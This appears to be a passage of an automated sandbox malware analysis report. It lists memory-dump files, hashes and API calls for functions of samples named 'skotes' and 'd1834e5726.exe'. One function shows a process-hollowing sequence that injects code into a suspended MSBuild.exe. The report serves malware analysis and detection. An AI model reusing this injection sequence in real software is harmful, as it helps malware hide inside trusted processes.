Associated: 00000003.00000002.2134932829.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134955924.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134977978.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135000432.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135022080.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135049071.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135071621.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135093170.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135121752.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135151416.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135175194.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135197946.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135219761.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135241305.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135263120.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135289439.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135313680.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135334110.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135354988.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135391376.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135434782.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135460168.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135484161.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135506530.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135528898.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135551707.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135573278.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135595071.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135620544.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135649407.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135797821.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135823880.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135855581.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135886291.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135924836.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135953206.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: c64b582584f1ba6f1b77191c70a155b5838d7e0e67f371d6fce0612362c8bbe2
Instruction ID: f5ee0a315b13735ce78b5442ae3d57aee6f27532b6768a99d802f446fa2a376d
Opcode Fuzzy Hash: c64b582584f1ba6f1b77191c70a155b5838d7e0e67f371d6fce0612362c8bbe2
Instruction Fuzzy Hash: 2BA1F371E41206AFDB10EF65CE45BAAB7A8FF14364F04812DE819D7241EB35EA04EBD1

Function 00FECBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00FECC66

Memory Dump Source

Source File: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.2134472755.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134494920.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134570681.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134591184.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134616107.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134641725.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134664275.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134796588.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134819402.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134891398.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134932829.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134955924.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134977978.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135000432.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135022080.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135049071.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135071621.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135093170.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135121752.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135151416.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135175194.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135197946.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135219761.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135241305.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135263120.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135289439.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135313680.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135334110.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135354988.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135391376.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135434782.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135460168.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135484161.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135506530.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135528898.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135551707.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135573278.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135595071.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135620544.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135649407.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135797821.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135823880.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135855581.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135886291.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135924836.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135953206.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: dd05b4bd6bc9a135e851fbdd7a7336a55597385e22180c520d6f357ff6532f2f
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 8FB1F232D042C59FDB25CF2AC881BBEBBA5EF45350F24416AF855EB241D6399D03DBA0

Function 00FCBB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00FCBBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00FCBBE4
_xtime_get.LIBCPMT ref: 00FCBC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00FCBC13

Memory Dump Source

Source File: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.2134472755.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134494920.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134570681.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134591184.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134616107.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134641725.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134664275.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134796588.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134819402.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134891398.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134932829.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134955924.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134977978.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135000432.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135022080.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135049071.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135071621.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135093170.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135121752.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135151416.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135175194.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135197946.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135219761.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135241305.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135263120.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135289439.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135313680.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135334110.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135354988.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135391376.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135434782.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135460168.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135484161.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135506530.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135528898.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135551707.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135573278.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135595071.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135620544.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135649407.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135797821.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135823880.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135855581.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135886291.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135924836.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135953206.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: b2d4ff15728042e7e75c12b8726096b043d64bbbd8d56fde7004660af079a0ed
Instruction ID: 632d9fab2a9d2fe0873d983d54fb034023beb8ec72c64e01e7aef8ded841783b
Opcode Fuzzy Hash: b2d4ff15728042e7e75c12b8726096b043d64bbbd8d56fde7004660af079a0ed
Instruction Fuzzy Hash: AF211D75E0011AAFDF01EBA4DE82EBEB7B9EF48710F11005DF505A7251DB399D01ABA1

Analysis Process: d1834e5726.exePID: 5312, Parent PID: 5492COMMON

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.4%
Total number of Nodes:	1451
Total number of Limit Nodes:	17

Executed Functions

Function 004FE1A9 Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,004FE11B,004FE10B), ref: 004FE33F
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 004FE352
Wow64GetThreadContext.KERNEL32(000001A4,00000000), ref: 004FE370
ReadProcessMemory.KERNELBASE(000001A0,?,004FE15F,00000004,00000000), ref: 004FE394
VirtualAllocEx.KERNELBASE(000001A0,?,?,00003000,00000040), ref: 004FE3BF
TerminateProcess.KERNELBASE(000001A0,00000000), ref: 004FE3DE
WriteProcessMemory.KERNELBASE(000001A0,00000000,?,?,00000000,?), ref: 004FE417
WriteProcessMemory.KERNELBASE(000001A0,00400000,?,?,00000000,?,00000028), ref: 004FE462
WriteProcessMemory.KERNELBASE(000001A0,?,?,00000004,00000000), ref: 004FE4A0
Wow64SetThreadContext.KERNEL32(000001A4,012F0000), ref: 004FE4DC
ResumeThread.KERNELBASE(000001A4), ref: 004FE4EB

Strings

VirtualAlloc, xrefs: 004FE26E
Load, xrefs: 004FE1E5
aryA, xrefs: 004FE1ED
ResumeThread, xrefs: 004FE2E3
ReadProcessMemory, xrefs: 004FE294
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 004FE33E
SetThreadContext, xrefs: 004FE2CD
GetThreadContext, xrefs: 004FE281
TerminateProcess, xrefs: 004FE3CE
VirtualAllocEx, xrefs: 004FE2A7
GetP, xrefs: 004FE229
WriteProcessMemory, xrefs: 004FE2BA
CreateProcessW, xrefs: 004FE25B
ress, xrefs: 004FE231

Memory Dump Source

Source File: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: e963cb516c12bc0cd10ba3214c626ce046ea91d649a0bcfee9dbf7600346d8b7
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: DFB1187260024AAFDB60CF69CC80BEA73A5FF88714F158165EA0CAB351D774FA41CB94

Function 004E17D0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 293
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004E1000: _strlen.LIBCMT ref: 004E108D

CreateFileA.KERNELBASE ref: 004E184C
GetFileSize.KERNEL32(00000000,00000000), ref: 004E185C
ReadFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 004E1885
CloseHandle.KERNELBASE(00000000), ref: 004E1895
_strlen.LIBCMT ref: 004E18F7
CloseHandle.KERNEL32(00000000), ref: 004E1B20
CloseHandle.KERNEL32(00000000), ref: 004E1B35

Strings

(, xrefs: 004E18D0

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: CloseFileHandle$_strlen$CreateReadSize
String ID: (
API String ID: 2150716653-3887548279
Opcode ID: c6825ebe0d36bf865c3cc6505edcf1fb1ac4ab4c6c0cbcfa2ed89ae3fea0b994
Instruction ID: ce394cc38b9e22c3950c84662fca1a6e48408651b17ca16b05e4ff261ee10224
Opcode Fuzzy Hash: c6825ebe0d36bf865c3cc6505edcf1fb1ac4ab4c6c0cbcfa2ed89ae3fea0b994
Instruction Fuzzy Hash: E3A12972D402548FCB10DFB9DD85AAEFBB6BF4A310F14162AE801A7361E7389941CB58

Function 004E1D30 Relevance: 18.2, APIs: 12, Instructions: 176
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 004E1D63
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004E1D76

Part of subcall function 004E234A: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004E2E92
Part of subcall function 004E234A: ___raise_securityfailure.LIBCMT ref: 004E2F7A

GetCurrentThreadId.KERNEL32 ref: 004E1DFA

Part of subcall function 004E2E15: WaitForSingleObjectEx.KERNEL32(004E17D0,000000FF,00000000,?,?,?,004E1E17,?,004E17D0,00000000), ref: 004E2E21
Part of subcall function 004E2E15: GetExitCodeThread.KERNEL32(004E17D0,00000000,?,?,004E1E17,?,004E17D0,00000000), ref: 004E2E3A
Part of subcall function 004E2E15: CloseHandle.KERNEL32(004E17D0,?,?,004E1E17,?,004E17D0,00000000), ref: 004E2E4C

Part of subcall function 004E6F9F: CreateThread.KERNELBASE(00000000,00000000,Function_000070B7,00000000,00000000,00000000), ref: 004E6FE8
Part of subcall function 004E6F9F: GetLastError.KERNEL32(?,?,?,?,004E1DD3,00000000,00000000), ref: 004E6FF4
Part of subcall function 004E6F9F: __dosmaperr.LIBCMT ref: 004E6FFB

GetCurrentThreadId.KERNEL32 ref: 004E1E95
std::_Throw_Cpp_error.LIBCPMT ref: 004E1EED
std::_Throw_Cpp_error.LIBCPMT ref: 004E1EFF
std::_Throw_Cpp_error.LIBCPMT ref: 004E1F0E
std::_Throw_Cpp_error.LIBCPMT ref: 004E1F1D
std::_Throw_Cpp_error.LIBCPMT ref: 004E1F2C
std::_Throw_Cpp_error.LIBCPMT ref: 004E1F3E
std::_Throw_Cpp_error.LIBCPMT ref: 004E1F50
std::_Throw_Cpp_error.LIBCPMT ref: 004E1F62

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$Thread$CurrentHandleModule$CloseCodeCreateErrorExitFeatureFileLastNameObjectPresentProcessorSingleWait___raise_securityfailure__dosmaperr
String ID:
API String ID: 610485761-0
Opcode ID: 8c7cc4c47a7f79e7cd6bd81148d5d372a0c3d610bf0d06e678a12313079f2852
Instruction ID: b20f996ec65aa9b0dade429103d1e6096bef79de02afadcdeaa339789c258213
Opcode Fuzzy Hash: 8c7cc4c47a7f79e7cd6bd81148d5d372a0c3d610bf0d06e678a12313079f2852
Instruction Fuzzy Hash: AB51D1B1D812499BEB10EFA6CD02BDFB6B4AF05715F040269E914373D0E7F96904CAA9

Function 004E9BBE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,98F3976D,?,004E9CCD,?,?,00000000), ref: 004E9C7F

Strings

api-ms-, xrefs: 004E9C15
ext-ms-, xrefs: 004E9C29

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 7d36d20435da772b93ab9856b512b61643e36e1aedf97770ff7fd2ed79235f94
Instruction ID: b57c0fcb4fbb1178145c58b20c90dc1f3e423b263c6445021c01c9bda7270e53
Opcode Fuzzy Hash: 7d36d20435da772b93ab9856b512b61643e36e1aedf97770ff7fd2ed79235f94
Instruction Fuzzy Hash: C521E732A00298ABD721AB22DD84A7B37D9EF41766F340172E916A73D0D638FD11C6DC

Function 004E13F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoResumeClassObjects.OLE32 ref: 004E150E
KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 004E1521
GetLastError.KERNEL32 ref: 004E1583

Strings

Fu, xrefs: 004E1521

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ClassDispatcherErrorExceptionLastObjectsResumeUser
String ID: Fu
API String ID: 3099690820-2244517181
Opcode ID: e68ac0cd76c71162448d73feae69aeb2bd20be7329dbd26dd5dfa3707745dfbd
Instruction ID: 6fb79226ae56b7aef96ded89034f9f412758e8d320faf64dc3843e2740487f58
Opcode Fuzzy Hash: e68ac0cd76c71162448d73feae69aeb2bd20be7329dbd26dd5dfa3707745dfbd
Instruction Fuzzy Hash: FB5180708052988BDF11CFA9D445BEEBFB0BF0A315F1441AAD845B3381C3795A05CFA9

Function 004E70B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(004FD900,0000000C), ref: 004E70CA
ExitThread.KERNEL32 ref: 004E70D1

Strings

f2N, xrefs: 004E7107

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
